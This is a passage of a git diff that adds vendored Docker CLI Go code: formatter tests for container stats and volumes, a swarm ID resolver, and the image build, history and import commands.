Context{Format: "{{.Container}} {{.CPUPerc}}"}, + `container1 20.00% +container2 -- +`, + }, + { + Context{Format: "{{.Container}} {{.MemPerc}} {{.PIDs}}"}, + `container1 -- -- +container2 -- -- +`, + }, + } + + for _, te := range tt { + stats := []StatsEntry{ + { + Container: "container1", + CPUPercentage: 20, + Memory: 20, + MemoryLimit: 20, + MemoryPercentage: 20, + NetworkRx: 20, + NetworkTx: 20, + BlockRead: 20, + BlockWrite: 20, + PidsCurrent: 2, + IsInvalid: false, + OSType: "windows", + }, + { + Container: "container2", + CPUPercentage: 30, + Memory: 30, + MemoryLimit: 30, + MemoryPercentage: 30, + NetworkRx: 30, + NetworkTx: 30, + BlockRead: 30, + BlockWrite: 30, + PidsCurrent: 3, + IsInvalid: true, + OSType: "windows", + }, + } + var out bytes.Buffer + te.context.Output = &out + err := ContainerStatsWrite(te.context, stats) + if err != nil { + assert.Error(t, err, te.expected) + } else { + assert.Equal(t, out.String(), te.expected) + } + } +} + +func TestContainerStatsContextWriteWithNoStats(t *testing.T) { + var out bytes.Buffer + + contexts := []struct { + context Context + expected string + }{ + { + Context{ + Format: "{{.Container}}", + Output: &out, + }, + "", + }, + { + Context{ + Format: "table {{.Container}}", + Output: &out, + }, + "CONTAINER\n", + }, + { + Context{ + Format: "table {{.Container}}\t{{.CPUPerc}}", + Output: &out, + }, + "CONTAINER CPU %\n", + }, + } + + for _, context := range contexts { + ContainerStatsWrite(context.context, []StatsEntry{}) + assert.Equal(t, context.expected, out.String()) + // Clean buffer + out.Reset() + } +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/volume.go b/vendor/github.com/docker/docker/cli/command/formatter/volume.go new file mode 100644 index 0000000000..90c9b13536 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/volume.go @@ -0,0 +1,121 @@ +package formatter + +import ( + "fmt" + "strings" + + "github.com/docker/docker/api/types" + units 
"github.com/docker/go-units" +) + +const ( + defaultVolumeQuietFormat = "{{.Name}}" + defaultVolumeTableFormat = "table {{.Driver}}\t{{.Name}}" + + volumeNameHeader = "VOLUME NAME" + mountpointHeader = "MOUNTPOINT" + linksHeader = "LINKS" + // Status header ? +) + +// NewVolumeFormat returns a format for use with a volume Context +func NewVolumeFormat(source string, quiet bool) Format { + switch source { + case TableFormatKey: + if quiet { + return defaultVolumeQuietFormat + } + return defaultVolumeTableFormat + case RawFormatKey: + if quiet { + return `name: {{.Name}}` + } + return `name: {{.Name}}\ndriver: {{.Driver}}\n` + } + return Format(source) +} + +// VolumeWrite writes formatted volumes using the Context +func VolumeWrite(ctx Context, volumes []*types.Volume) error { + render := func(format func(subContext subContext) error) error { + for _, volume := range volumes { + if err := format(&volumeContext{v: *volume}); err != nil { + return err + } + } + return nil + } + return ctx.Write(&volumeContext{}, render) +} + +type volumeContext struct { + HeaderContext + v types.Volume +} + +func (c *volumeContext) MarshalJSON() ([]byte, error) { + return marshalJSON(c) +} + +func (c *volumeContext) Name() string { + c.AddHeader(volumeNameHeader) + return c.v.Name +} + +func (c *volumeContext) Driver() string { + c.AddHeader(driverHeader) + return c.v.Driver +} + +func (c *volumeContext) Scope() string { + c.AddHeader(scopeHeader) + return c.v.Scope +} + +func (c *volumeContext) Mountpoint() string { + c.AddHeader(mountpointHeader) + return c.v.Mountpoint +} + +func (c *volumeContext) Labels() string { + c.AddHeader(labelsHeader) + if c.v.Labels == nil { + return "" + } + + var joinLabels []string + for k, v := range c.v.Labels { + joinLabels = append(joinLabels, fmt.Sprintf("%s=%s", k, v)) + } + return strings.Join(joinLabels, ",") +} + +func (c *volumeContext) Label(name string) string { + + n := strings.Split(name, ".") + r := strings.NewReplacer("-", " ", "_", " 
") + h := r.Replace(n[len(n)-1]) + + c.AddHeader(h) + + if c.v.Labels == nil { + return "" + } + return c.v.Labels[name] +} + +func (c *volumeContext) Links() string { + c.AddHeader(linksHeader) + if c.v.UsageData == nil { + return "N/A" + } + return fmt.Sprintf("%d", c.v.UsageData.RefCount) +} + +func (c *volumeContext) Size() string { + c.AddHeader(sizeHeader) + if c.v.UsageData == nil { + return "N/A" + } + return units.HumanSize(float64(c.v.UsageData.Size)) +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/volume_test.go b/vendor/github.com/docker/docker/cli/command/formatter/volume_test.go new file mode 100644 index 0000000000..9ec18b6916 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/volume_test.go @@ -0,0 +1,189 @@ +package formatter + +import ( + "bytes" + "encoding/json" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestVolumeContext(t *testing.T) { + volumeName := stringid.GenerateRandomID() + + var ctx volumeContext + cases := []struct { + volumeCtx volumeContext + expValue string + expHeader string + call func() string + }{ + {volumeContext{ + v: types.Volume{Name: volumeName}, + }, volumeName, volumeNameHeader, ctx.Name}, + {volumeContext{ + v: types.Volume{Driver: "driver_name"}, + }, "driver_name", driverHeader, ctx.Driver}, + {volumeContext{ + v: types.Volume{Scope: "local"}, + }, "local", scopeHeader, ctx.Scope}, + {volumeContext{ + v: types.Volume{Mountpoint: "mountpoint"}, + }, "mountpoint", mountpointHeader, ctx.Mountpoint}, + {volumeContext{ + v: types.Volume{}, + }, "", labelsHeader, ctx.Labels}, + {volumeContext{ + v: types.Volume{Labels: map[string]string{"label1": "value1", "label2": "value2"}}, + }, "label1=value1,label2=value2", labelsHeader, ctx.Labels}, + } + + for _, c := range cases { + ctx = c.volumeCtx + v := c.call() + if strings.Contains(v, ",") { + 
compareMultipleValues(t, v, c.expValue) + } else if v != c.expValue { + t.Fatalf("Expected %s, was %s\n", c.expValue, v) + } + + h := ctx.FullHeader() + if h != c.expHeader { + t.Fatalf("Expected %s, was %s\n", c.expHeader, h) + } + } +} + +func TestVolumeContextWrite(t *testing.T) { + cases := []struct { + context Context + expected string + }{ + + // Errors + { + Context{Format: "{{InvalidFunction}}"}, + `Template parsing error: template: :1: function "InvalidFunction" not defined +`, + }, + { + Context{Format: "{{nil}}"}, + `Template parsing error: template: :1:2: executing "" at : nil is not a command +`, + }, + // Table format + { + Context{Format: NewVolumeFormat("table", false)}, + `DRIVER VOLUME NAME +foo foobar_baz +bar foobar_bar +`, + }, + { + Context{Format: NewVolumeFormat("table", true)}, + `foobar_baz +foobar_bar +`, + }, + { + Context{Format: NewVolumeFormat("table {{.Name}}", false)}, + `VOLUME NAME +foobar_baz +foobar_bar +`, + }, + { + Context{Format: NewVolumeFormat("table {{.Name}}", true)}, + `VOLUME NAME +foobar_baz +foobar_bar +`, + }, + // Raw Format + { + Context{Format: NewVolumeFormat("raw", false)}, + `name: foobar_baz +driver: foo + +name: foobar_bar +driver: bar + +`, + }, + { + Context{Format: NewVolumeFormat("raw", true)}, + `name: foobar_baz +name: foobar_bar +`, + }, + // Custom Format + { + Context{Format: NewVolumeFormat("{{.Name}}", false)}, + `foobar_baz +foobar_bar +`, + }, + } + + for _, testcase := range cases { + volumes := []*types.Volume{ + {Name: "foobar_baz", Driver: "foo"}, + {Name: "foobar_bar", Driver: "bar"}, + } + out := bytes.NewBufferString("") + testcase.context.Output = out + err := VolumeWrite(testcase.context, volumes) + if err != nil { + assert.Error(t, err, testcase.expected) + } else { + assert.Equal(t, out.String(), testcase.expected) + } + } +} + +func TestVolumeContextWriteJSON(t *testing.T) { + volumes := []*types.Volume{ + {Driver: "foo", Name: "foobar_baz"}, + {Driver: "bar", Name: "foobar_bar"}, + 
} + expectedJSONs := []map[string]interface{}{ + {"Driver": "foo", "Labels": "", "Links": "N/A", "Mountpoint": "", "Name": "foobar_baz", "Scope": "", "Size": "N/A"}, + {"Driver": "bar", "Labels": "", "Links": "N/A", "Mountpoint": "", "Name": "foobar_bar", "Scope": "", "Size": "N/A"}, + } + out := bytes.NewBufferString("") + err := VolumeWrite(Context{Format: "{{json .}}", Output: out}, volumes) + if err != nil { + t.Fatal(err) + } + for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { + t.Logf("Output: line %d: %s", i, line) + var m map[string]interface{} + if err := json.Unmarshal([]byte(line), &m); err != nil { + t.Fatal(err) + } + assert.DeepEqual(t, m, expectedJSONs[i]) + } +} + +func TestVolumeContextWriteJSONField(t *testing.T) { + volumes := []*types.Volume{ + {Driver: "foo", Name: "foobar_baz"}, + {Driver: "bar", Name: "foobar_bar"}, + } + out := bytes.NewBufferString("") + err := VolumeWrite(Context{Format: "{{json .Name}}", Output: out}, volumes) + if err != nil { + t.Fatal(err) + } + for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { + t.Logf("Output: line %d: %s", i, line) + var s string + if err := json.Unmarshal([]byte(line), &s); err != nil { + t.Fatal(err) + } + assert.Equal(t, s, volumes[i].Name) + } +} diff --git a/vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go b/vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go new file mode 100644 index 0000000000..511b1a8f54 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go @@ -0,0 +1,90 @@ +package idresolver + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/client" + "github.com/docker/docker/pkg/stringid" +) + +// IDResolver provides ID to Name resolution. +type IDResolver struct { + client client.APIClient + noResolve bool + cache map[string]string +} + +// New creates a new IDResolver. 
+func New(client client.APIClient, noResolve bool) *IDResolver { + return &IDResolver{ + client: client, + noResolve: noResolve, + cache: make(map[string]string), + } +} + +func (r *IDResolver) get(ctx context.Context, t interface{}, id string) (string, error) { + switch t := t.(type) { + case swarm.Node: + node, _, err := r.client.NodeInspectWithRaw(ctx, id) + if err != nil { + return id, nil + } + if node.Spec.Annotations.Name != "" { + return node.Spec.Annotations.Name, nil + } + if node.Description.Hostname != "" { + return node.Description.Hostname, nil + } + return id, nil + case swarm.Service: + service, _, err := r.client.ServiceInspectWithRaw(ctx, id) + if err != nil { + return id, nil + } + return service.Spec.Annotations.Name, nil + case swarm.Task: + // If the caller passes the full task there's no need to do a lookup. + if t.ID == "" { + var err error + + t, _, err = r.client.TaskInspectWithRaw(ctx, id) + if err != nil { + return id, nil + } + } + taskID := stringid.TruncateID(t.ID) + if t.ServiceID == "" { + return taskID, nil + } + service, err := r.Resolve(ctx, swarm.Service{}, t.ServiceID) + if err != nil { + return "", err + } + return fmt.Sprintf("%s.%d.%s", service, t.Slot, taskID), nil + default: + return "", fmt.Errorf("unsupported type") + } + +} + +// Resolve will attempt to resolve an ID to a Name by querying the manager. +// Results are stored into a cache. +// If the `-n` flag is used in the command-line, resolution is disabled. 
+func (r *IDResolver) Resolve(ctx context.Context, t interface{}, id string) (string, error) { + if r.noResolve { + return id, nil + } + if name, ok := r.cache[id]; ok { + return name, nil + } + name, err := r.get(ctx, t, id) + if err != nil { + return "", err + } + r.cache[id] = name + return name, nil +} diff --git a/vendor/github.com/docker/docker/cli/command/image/build.go b/vendor/github.com/docker/docker/cli/command/image/build.go new file mode 100644 index 0000000000..0c88af5fcd --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/build.go @@ -0,0 +1,477 @@ +package image + +import ( + "archive/tar" + "bufio" + "bytes" + "fmt" + "io" + "os" + "path/filepath" + "regexp" + "runtime" + + "golang.org/x/net/context" + + "github.com/docker/docker/api" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/builder" + "github.com/docker/docker/builder/dockerignore" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/fileutils" + "github.com/docker/docker/pkg/jsonmessage" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/streamformatter" + "github.com/docker/docker/pkg/urlutil" + "github.com/docker/docker/reference" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/docker/go-units" + "github.com/spf13/cobra" +) + +type buildOptions struct { + context string + dockerfileName string + tags opts.ListOpts + labels opts.ListOpts + buildArgs opts.ListOpts + ulimits *runconfigopts.UlimitOpt + memory string + memorySwap string + shmSize string + cpuShares int64 + cpuPeriod int64 + cpuQuota int64 + cpuSetCpus string + cpuSetMems string + cgroupParent string + isolation string + quiet bool + noCache bool + rm bool + forceRm bool + pull bool + cacheFrom []string + compress bool + securityOpt []string + networkMode string + squash 
bool +} + +// NewBuildCommand creates a new `docker build` command +func NewBuildCommand(dockerCli *command.DockerCli) *cobra.Command { + ulimits := make(map[string]*units.Ulimit) + options := buildOptions{ + tags: opts.NewListOpts(validateTag), + buildArgs: opts.NewListOpts(runconfigopts.ValidateEnv), + ulimits: runconfigopts.NewUlimitOpt(&ulimits), + labels: opts.NewListOpts(runconfigopts.ValidateEnv), + } + + cmd := &cobra.Command{ + Use: "build [OPTIONS] PATH | URL | -", + Short: "Build an image from a Dockerfile", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + options.context = args[0] + return runBuild(dockerCli, options) + }, + } + + flags := cmd.Flags() + + flags.VarP(&options.tags, "tag", "t", "Name and optionally a tag in the 'name:tag' format") + flags.Var(&options.buildArgs, "build-arg", "Set build-time variables") + flags.Var(options.ulimits, "ulimit", "Ulimit options") + flags.StringVarP(&options.dockerfileName, "file", "f", "", "Name of the Dockerfile (Default is 'PATH/Dockerfile')") + flags.StringVarP(&options.memory, "memory", "m", "", "Memory limit") + flags.StringVar(&options.memorySwap, "memory-swap", "", "Swap limit equal to memory plus swap: '-1' to enable unlimited swap") + flags.StringVar(&options.shmSize, "shm-size", "", "Size of /dev/shm, default value is 64MB") + flags.Int64VarP(&options.cpuShares, "cpu-shares", "c", 0, "CPU shares (relative weight)") + flags.Int64Var(&options.cpuPeriod, "cpu-period", 0, "Limit the CPU CFS (Completely Fair Scheduler) period") + flags.Int64Var(&options.cpuQuota, "cpu-quota", 0, "Limit the CPU CFS (Completely Fair Scheduler) quota") + flags.StringVar(&options.cpuSetCpus, "cpuset-cpus", "", "CPUs in which to allow execution (0-3, 0,1)") + flags.StringVar(&options.cpuSetMems, "cpuset-mems", "", "MEMs in which to allow execution (0-3, 0,1)") + flags.StringVar(&options.cgroupParent, "cgroup-parent", "", "Optional parent cgroup for the container") + 
flags.StringVar(&options.isolation, "isolation", "", "Container isolation technology")
+	flags.Var(&options.labels, "label", "Set metadata for an image")
+	flags.BoolVar(&options.noCache, "no-cache", false, "Do not use cache when building the image")
+	flags.BoolVar(&options.rm, "rm", true, "Remove intermediate containers after a successful build")
+	flags.BoolVar(&options.forceRm, "force-rm", false, "Always remove intermediate containers")
+	flags.BoolVarP(&options.quiet, "quiet", "q", false, "Suppress the build output and print image ID on success")
+	flags.BoolVar(&options.pull, "pull", false, "Always attempt to pull a newer version of the image")
+	flags.StringSliceVar(&options.cacheFrom, "cache-from", []string{}, "Images to consider as cache sources")
+	flags.BoolVar(&options.compress, "compress", false, "Compress the build context using gzip")
+	flags.StringSliceVar(&options.securityOpt, "security-opt", []string{}, "Security options")
+	flags.StringVar(&options.networkMode, "network", "default", "Set the networking mode for the RUN instructions during build")
+
+	command.AddTrustedFlags(flags, true)
+
+	flags.BoolVar(&options.squash, "squash", false, "Squash newly built layers into a single new layer")
+	flags.SetAnnotation("squash", "experimental", nil)
+	flags.SetAnnotation("squash", "version", []string{"1.25"})
+
+	return cmd
+}
+
+// lastProgressOutput is the same as progress.Output except
+// that it only outputs with the last update. It is used in
+// non terminal scenarios to suppress verbose messages
+type lastProgressOutput struct {
+	output progress.Output
+}
+
+// WriteProgress formats progress information from a ProgressReader.
+func (out *lastProgressOutput) WriteProgress(prog progress.Progress) error { + if !prog.LastUpdate { + return nil + } + + return out.output.WriteProgress(prog) +} + +func runBuild(dockerCli *command.DockerCli, options buildOptions) error { + + var ( + buildCtx io.ReadCloser + err error + contextDir string + tempDir string + relDockerfile string + progBuff io.Writer + buildBuff io.Writer + ) + + specifiedContext := options.context + progBuff = dockerCli.Out() + buildBuff = dockerCli.Out() + if options.quiet { + progBuff = bytes.NewBuffer(nil) + buildBuff = bytes.NewBuffer(nil) + } + + switch { + case specifiedContext == "-": + buildCtx, relDockerfile, err = builder.GetContextFromReader(dockerCli.In(), options.dockerfileName) + case urlutil.IsGitURL(specifiedContext): + tempDir, relDockerfile, err = builder.GetContextFromGitURL(specifiedContext, options.dockerfileName) + case urlutil.IsURL(specifiedContext): + buildCtx, relDockerfile, err = builder.GetContextFromURL(progBuff, specifiedContext, options.dockerfileName) + default: + contextDir, relDockerfile, err = builder.GetContextFromLocalDir(specifiedContext, options.dockerfileName) + } + + if err != nil { + if options.quiet && urlutil.IsURL(specifiedContext) { + fmt.Fprintln(dockerCli.Err(), progBuff) + } + return fmt.Errorf("unable to prepare context: %s", err) + } + + if tempDir != "" { + defer os.RemoveAll(tempDir) + contextDir = tempDir + } + + if buildCtx == nil { + // And canonicalize dockerfile name to a platform-independent one + relDockerfile, err = archive.CanonicalTarNameForPath(relDockerfile) + if err != nil { + return fmt.Errorf("cannot canonicalize dockerfile path %s: %v", relDockerfile, err) + } + + f, err := os.Open(filepath.Join(contextDir, ".dockerignore")) + if err != nil && !os.IsNotExist(err) { + return err + } + defer f.Close() + + var excludes []string + if err == nil { + excludes, err = dockerignore.ReadAll(f) + if err != nil { + return err + } + } + + if err := 
builder.ValidateContextDirectory(contextDir, excludes); err != nil { + return fmt.Errorf("Error checking context: '%s'.", err) + } + + // If .dockerignore mentions .dockerignore or the Dockerfile + // then make sure we send both files over to the daemon + // because Dockerfile is, obviously, needed no matter what, and + // .dockerignore is needed to know if either one needs to be + // removed. The daemon will remove them for us, if needed, after it + // parses the Dockerfile. Ignore errors here, as they will have been + // caught by validateContextDirectory above. + var includes = []string{"."} + keepThem1, _ := fileutils.Matches(".dockerignore", excludes) + keepThem2, _ := fileutils.Matches(relDockerfile, excludes) + if keepThem1 || keepThem2 { + includes = append(includes, ".dockerignore", relDockerfile) + } + + compression := archive.Uncompressed + if options.compress { + compression = archive.Gzip + } + buildCtx, err = archive.TarWithOptions(contextDir, &archive.TarOptions{ + Compression: compression, + ExcludePatterns: excludes, + IncludeFiles: includes, + }) + if err != nil { + return err + } + } + + ctx := context.Background() + + var resolvedTags []*resolvedTag + if command.IsTrusted() { + translator := func(ctx context.Context, ref reference.NamedTagged) (reference.Canonical, error) { + return TrustedReference(ctx, dockerCli, ref, nil) + } + // Wrap the tar archive to replace the Dockerfile entry with the rewritten + // Dockerfile which uses trusted pulls. 
+ buildCtx = replaceDockerfileTarWrapper(ctx, buildCtx, relDockerfile, translator, &resolvedTags) + } + + // Setup an upload progress bar + progressOutput := streamformatter.NewStreamFormatter().NewProgressOutput(progBuff, true) + if !dockerCli.Out().IsTerminal() { + progressOutput = &lastProgressOutput{output: progressOutput} + } + + var body io.Reader = progress.NewProgressReader(buildCtx, progressOutput, 0, "", "Sending build context to Docker daemon") + + var memory int64 + if options.memory != "" { + parsedMemory, err := units.RAMInBytes(options.memory) + if err != nil { + return err + } + memory = parsedMemory + } + + var memorySwap int64 + if options.memorySwap != "" { + if options.memorySwap == "-1" { + memorySwap = -1 + } else { + parsedMemorySwap, err := units.RAMInBytes(options.memorySwap) + if err != nil { + return err + } + memorySwap = parsedMemorySwap + } + } + + var shmSize int64 + if options.shmSize != "" { + shmSize, err = units.RAMInBytes(options.shmSize) + if err != nil { + return err + } + } + + authConfigs, _ := dockerCli.GetAllCredentials() + buildOptions := types.ImageBuildOptions{ + Memory: memory, + MemorySwap: memorySwap, + Tags: options.tags.GetAll(), + SuppressOutput: options.quiet, + NoCache: options.noCache, + Remove: options.rm, + ForceRemove: options.forceRm, + PullParent: options.pull, + Isolation: container.Isolation(options.isolation), + CPUSetCPUs: options.cpuSetCpus, + CPUSetMems: options.cpuSetMems, + CPUShares: options.cpuShares, + CPUQuota: options.cpuQuota, + CPUPeriod: options.cpuPeriod, + CgroupParent: options.cgroupParent, + Dockerfile: relDockerfile, + ShmSize: shmSize, + Ulimits: options.ulimits.GetList(), + BuildArgs: runconfigopts.ConvertKVStringsToMapWithNil(options.buildArgs.GetAll()), + AuthConfigs: authConfigs, + Labels: runconfigopts.ConvertKVStringsToMap(options.labels.GetAll()), + CacheFrom: options.cacheFrom, + SecurityOpt: options.securityOpt, + NetworkMode: options.networkMode, + Squash: options.squash, + } 
+ + response, err := dockerCli.Client().ImageBuild(ctx, body, buildOptions) + if err != nil { + if options.quiet { + fmt.Fprintf(dockerCli.Err(), "%s", progBuff) + } + return err + } + defer response.Body.Close() + + err = jsonmessage.DisplayJSONMessagesStream(response.Body, buildBuff, dockerCli.Out().FD(), dockerCli.Out().IsTerminal(), nil) + if err != nil { + if jerr, ok := err.(*jsonmessage.JSONError); ok { + // If no error code is set, default to 1 + if jerr.Code == 0 { + jerr.Code = 1 + } + if options.quiet { + fmt.Fprintf(dockerCli.Err(), "%s%s", progBuff, buildBuff) + } + return cli.StatusError{Status: jerr.Message, StatusCode: jerr.Code} + } + } + + // Windows: show error message about modified file permissions if the + // daemon isn't running Windows. + if response.OSType != "windows" && runtime.GOOS == "windows" && !options.quiet { + fmt.Fprintln(dockerCli.Err(), `SECURITY WARNING: You are building a Docker image from Windows against a non-Windows Docker host. All files and directories added to build context will have '-rwxr-xr-x' permissions. It is recommended to double check and reset permissions for sensitive files and directories.`) + } + + // Everything worked so if -q was provided the output from the daemon + // should be just the image ID and we'll print that to stdout. + if options.quiet { + fmt.Fprintf(dockerCli.Out(), "%s", buildBuff) + } + + if command.IsTrusted() { + // Since the build was successful, now we must tag any of the resolved + // images from the above Dockerfile rewrite. + for _, resolved := range resolvedTags { + if err := TagTrusted(ctx, dockerCli, resolved.digestRef, resolved.tagRef); err != nil { + return err + } + } + } + + return nil +} + +type translatorFunc func(context.Context, reference.NamedTagged) (reference.Canonical, error) + +// validateTag checks if the given image name can be resolved. 
+func validateTag(rawRepo string) (string, error) {
+	_, err := reference.ParseNamed(rawRepo)
+	if err != nil {
+		return "", err
+	}
+
+	return rawRepo, nil
+}
+
+var dockerfileFromLinePattern = regexp.MustCompile(`(?i)^[\s]*FROM[ \f\r\t\v]+(?P<image>[^ \f\r\t\v\n#]+)`)
+
+// resolvedTag records the repository, tag, and resolved digest reference
+// from a Dockerfile rewrite.
+type resolvedTag struct {
+	digestRef reference.Canonical
+	tagRef    reference.NamedTagged
+}
+
+// rewriteDockerfileFrom rewrites the given Dockerfile by resolving images in
+// "FROM <image>" instructions to a digest reference. `translator` is a
+// function that takes a repository name and tag reference and returns a
+// trusted digest reference.
+func rewriteDockerfileFrom(ctx context.Context, dockerfile io.Reader, translator translatorFunc) (newDockerfile []byte, resolvedTags []*resolvedTag, err error) {
+	scanner := bufio.NewScanner(dockerfile)
+	buf := bytes.NewBuffer(nil)
+
+	// Scan the lines of the Dockerfile, looking for a "FROM" line.
+ for scanner.Scan() { + line := scanner.Text() + + matches := dockerfileFromLinePattern.FindStringSubmatch(line) + if matches != nil && matches[1] != api.NoBaseImageSpecifier { + // Replace the line with a resolved "FROM repo@digest" + ref, err := reference.ParseNamed(matches[1]) + if err != nil { + return nil, nil, err + } + ref = reference.WithDefaultTag(ref) + if ref, ok := ref.(reference.NamedTagged); ok && command.IsTrusted() { + trustedRef, err := translator(ctx, ref) + if err != nil { + return nil, nil, err + } + + line = dockerfileFromLinePattern.ReplaceAllLiteralString(line, fmt.Sprintf("FROM %s", trustedRef.String())) + resolvedTags = append(resolvedTags, &resolvedTag{ + digestRef: trustedRef, + tagRef: ref, + }) + } + } + + _, err := fmt.Fprintln(buf, line) + if err != nil { + return nil, nil, err + } + } + + return buf.Bytes(), resolvedTags, scanner.Err() +} + +// replaceDockerfileTarWrapper wraps the given input tar archive stream and +// replaces the entry with the given Dockerfile name with the contents of the +// new Dockerfile. Returns a new tar archive stream with the replaced +// Dockerfile. +func replaceDockerfileTarWrapper(ctx context.Context, inputTarStream io.ReadCloser, dockerfileName string, translator translatorFunc, resolvedTags *[]*resolvedTag) io.ReadCloser { + pipeReader, pipeWriter := io.Pipe() + go func() { + tarReader := tar.NewReader(inputTarStream) + tarWriter := tar.NewWriter(pipeWriter) + + defer inputTarStream.Close() + + for { + hdr, err := tarReader.Next() + if err == io.EOF { + // Signals end of archive. + tarWriter.Close() + pipeWriter.Close() + return + } + if err != nil { + pipeWriter.CloseWithError(err) + return + } + + content := io.Reader(tarReader) + if hdr.Name == dockerfileName { + // This entry is the Dockerfile. Since the tar archive was + // generated from a directory on the local filesystem, the + // Dockerfile will only appear once in the archive. 
+ var newDockerfile []byte + newDockerfile, *resolvedTags, err = rewriteDockerfileFrom(ctx, content, translator) + if err != nil { + pipeWriter.CloseWithError(err) + return + } + hdr.Size = int64(len(newDockerfile)) + content = bytes.NewBuffer(newDockerfile) + } + + if err := tarWriter.WriteHeader(hdr); err != nil { + pipeWriter.CloseWithError(err) + return + } + + if _, err := io.Copy(tarWriter, content); err != nil { + pipeWriter.CloseWithError(err) + return + } + } + }() + + return pipeReader +} diff --git a/vendor/github.com/docker/docker/cli/command/image/cmd.go b/vendor/github.com/docker/docker/cli/command/image/cmd.go new file mode 100644 index 0000000000..c3ca61f85b --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/cmd.go @@ -0,0 +1,33 @@ +package image + +import ( + "github.com/spf13/cobra" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" +) + +// NewImageCommand returns a cobra command for `image` subcommands +func NewImageCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "image", + Short: "Manage images", + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + } + cmd.AddCommand( + NewBuildCommand(dockerCli), + NewHistoryCommand(dockerCli), + NewImportCommand(dockerCli), + NewLoadCommand(dockerCli), + NewPullCommand(dockerCli), + NewPushCommand(dockerCli), + NewSaveCommand(dockerCli), + NewTagCommand(dockerCli), + newListCommand(dockerCli), + newRemoveCommand(dockerCli), + newInspectCommand(dockerCli), + NewPruneCommand(dockerCli), + ) + return cmd +} diff --git a/vendor/github.com/docker/docker/cli/command/image/history.go b/vendor/github.com/docker/docker/cli/command/image/history.go new file mode 100644 index 0000000000..91c8f75a63 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/history.go @@ -0,0 +1,99 @@ +package image + +import ( + "fmt" + "strconv" + "strings" + "text/tabwriter" + "time" + + "golang.org/x/net/context" + + 
"github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/stringutils" + "github.com/docker/go-units" + "github.com/spf13/cobra" +) + +type historyOptions struct { + image string + + human bool + quiet bool + noTrunc bool +} + +// NewHistoryCommand creates a new `docker history` command +func NewHistoryCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts historyOptions + + cmd := &cobra.Command{ + Use: "history [OPTIONS] IMAGE", + Short: "Show the history of an image", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.image = args[0] + return runHistory(dockerCli, opts) + }, + } + + flags := cmd.Flags() + + flags.BoolVarP(&opts.human, "human", "H", true, "Print sizes and dates in human readable format") + flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only show numeric IDs") + flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output") + + return cmd +} + +func runHistory(dockerCli *command.DockerCli, opts historyOptions) error { + ctx := context.Background() + + history, err := dockerCli.Client().ImageHistory(ctx, opts.image) + if err != nil { + return err + } + + w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0) + + if opts.quiet { + for _, entry := range history { + if opts.noTrunc { + fmt.Fprintf(w, "%s\n", entry.ID) + } else { + fmt.Fprintf(w, "%s\n", stringid.TruncateID(entry.ID)) + } + } + w.Flush() + return nil + } + + var imageID string + var createdBy string + var created string + var size string + + fmt.Fprintln(w, "IMAGE\tCREATED\tCREATED BY\tSIZE\tCOMMENT") + for _, entry := range history { + imageID = entry.ID + createdBy = strings.Replace(entry.CreatedBy, "\t", " ", -1) + if !opts.noTrunc { + createdBy = stringutils.Ellipsis(createdBy, 45) + imageID = stringid.TruncateID(entry.ID) + } + + if opts.human { + created = units.HumanDuration(time.Now().UTC().Sub(time.Unix(entry.Created, 0))) + 
" ago" + size = units.HumanSizeWithPrecision(float64(entry.Size), 3) + } else { + created = time.Unix(entry.Created, 0).Format(time.RFC3339) + size = strconv.FormatInt(entry.Size, 10) + } + + fmt.Fprintf(w, "%s\t%s\t%s\t%s\t%s\n", imageID, created, createdBy, size, entry.Comment) + } + w.Flush() + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/image/import.go b/vendor/github.com/docker/docker/cli/command/image/import.go new file mode 100644 index 0000000000..60024fb53c --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/image/import.go @@ -0,0 +1,88 @@ +package image + +import ( + "io" + "os" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + dockeropts "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/jsonmessage" + "github.com/docker/docker/pkg/urlutil" + "github.com/spf13/cobra" +) + +type importOptions struct { + source string + reference string + changes dockeropts.ListOpts + message string +} + +// NewImportCommand creates a new `docker import` command +func NewImportCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts importOptions + + cmd := &cobra.Command{ + Use: "import [OPTIONS] file|URL|- [REPOSITORY[:TAG]]", + Short: "Import the contents from a tarball to create a filesystem image", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.source = args[0] + if len(args) > 1 { + opts.reference = args[1] + } + return runImport(dockerCli, opts) + }, + } + + flags := 